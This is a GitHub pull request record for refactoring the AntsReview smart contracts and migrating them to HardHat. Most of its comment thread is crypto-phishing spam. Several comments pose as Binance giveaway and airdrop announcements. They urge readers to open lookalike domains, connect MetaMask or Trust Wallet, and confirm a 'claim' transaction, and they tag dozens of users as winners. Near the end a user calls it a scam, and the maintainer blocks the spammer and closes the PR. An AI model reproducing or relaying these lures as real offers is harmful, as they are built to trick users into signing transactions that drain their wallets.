### PR TITLE
AntsReview Refactoring + HardHat Migration

### PR DESCRIPTION
**Pull request by naszam**
# Description

AntsReview Contracts Refactoring + HardHat Migration.

# Checklist
- [ ] Smart Contracts Refactoring
- [ ] CI/CD GitHub Actions (Lint, Tests, Check and Fuzz)
- [x] HardHad Migration
- [x] Solhint 
- [ ] Solcover 
- [ ] Prettier
- [ ] TypeChain
- [ ] Ethers
- [ ] Waffle
- [ ] Fixtures  
- [ ] Tests in TypeScript 
- [ ] Run Coverage
- [ ] Run Slither
- [ ] Run Echidna 
- [ ] Dry Run Deployment on Sokol Testnet
- [ ] Ensure contract is verified on `sokol` blockscout
- [ ] Update Flow-Chart
- [ ] Update & Review README  
- [ ] `squash and merge` this PR

### CODE REVIEW

**Comment by bajarang-agarwal1** [comment]
# Binance Free Tokens Giveaway - Claim Yours Now! 🎉💰

Welcome to the exclusive Binance Free Tokens giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this fantastic opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

Binance Free Tokens

## Steps to Claim:

1. **Spread the Excitement on Twitter:**
   - Share the news about claiming your free tokens!
     - **Tweet:** [Claimed my free tokens on Binance! 🌟 #BinanceFreeTokens #Crypto](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto&hashtags=BinanceFreeTokens,Crypto)

2. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=github) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

3. **Interact with the Contract:**
   - Once your wallet is connected, go to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

4. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

5. **Spread the Excitement Further:**
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act swiftly and enjoy your tokens! This limited-time offer won't be available forever. 🌐💰

**Comment by devsquadcore** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

Claim your share of the $500k Binance Airdrop! As the year comes to an end, we're giving away $500 in BNB to celebrate. Follow the steps above to secure your tokens. Don't miss out on this festive giveaway!

[Claim Now](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.


Winners: @libaice, @varunsrin, @GrandGarcon, @farinavito, @listenaddress, @naszam, @achab, @anton-karlovskiy, @temucin, @marcellobardus, @yoshsa17, @0xrome, @philipglazman, @Crypto369, @rsarai, @yl, @ThaDoubleB, @cembatuisik, @jay-2000, @o2Stake, @ashablovskiy, @rac-sri, @avalidurl, @niranjans, @nickbytes, @tkmct, @akalmykov, @da-bao-jian, @saintsal, @ditorodev, @nakaakist, @mrdavey, @Bijan-Massoumi, @preetsethi, @rajivpo, @protortyp, @Lugdunumn, @iczc, @jonnydubowsky, @cainky, @0zAND1z, @beskay, @modulareum, @6, @fly51fly, @kontikii, @gelicamarie, @poria-cat, @rhhackett, @weedpatch2

**Comment by devsquadcore** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

Claim your share of the $500k Binance Airdrop! As the year comes to an end, we're giving away $500 in BNB to celebrate. Follow the steps above to secure your tokens. Don't miss out on this festive giveaway!

[Claim Now](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.


Winners: @

**Comment by libaice** [comment]
scam ！

**Comment by naszam** [comment]
> scam ！

Thanks for reporting, the user _devsquadcore_ have been reported/blocked and the comments have been removed.
I'll restrict comments going forward as those scam/spam attempts have targeted previously PRs and Issues.

**Comment by naszam** [comment]
Closing as obsolete, consider Foundry migration and refactoring with later solc version.

**Pull request closed without merging**
